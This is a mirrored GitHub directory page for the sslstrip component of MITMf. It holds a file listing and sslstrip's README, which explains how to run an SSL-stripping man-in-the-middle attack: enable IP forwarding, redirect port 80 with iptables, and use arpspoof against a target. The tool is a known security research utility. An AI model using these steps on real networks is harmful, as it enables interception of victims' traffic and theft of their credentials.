mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-07-08 05:51:48 -07:00
fd9b79c617
directory structure has been simplified by grouping all the poisoners and servers in one folder impacket smb server has been replaced with responder's flask http server has beem replaced with responder's modified config file to support new changes |
||
|---|---|---|
| .. | ||
| __init__.py | ||
| ClientRequest.py | ||
| CookieCleaner.py | ||
| COPYING.sslstrip | ||
| DnsCache.py | ||
| README.md | ||
| ServerConnection.py | ||
| ServerConnectionFactory.py | ||
| SSLServerConnection.py | ||
| StrippingProxy.py | ||
| URLMonitor.py | ||
sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping attacks.
It requires Python 2.5 or newer, along with the 'twisted' python module.
Installing: * Unpack: tar zxvf sslstrip-0.5.tar.gz * Install twisted: sudo apt-get install python-twisted-web * (Optionally) run 'python setup.py install' as root to install, or you can just run it out of the directory.
Running:
sslstrip can be run from the source base without installation.
Just run 'python sslstrip.py -h' as a non-root user to get the
command-line options.
The four steps to getting this working (assuming you're running Linux)
are:
1) Flip your machine into forwarding mode (as root):
echo "1" > /proc/sys/net/ipv4/ip_forward
2) Setup iptables to intercept HTTP requests (as root):
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <yourListenPort>
3) Run sslstrip with the command-line options you'd like (see above).
4) Run arpspoof to redirect traffic to your machine (as root):
arpspoof -i <yourNetworkdDevice> -t <yourTarget> <theRoutersIpAddress>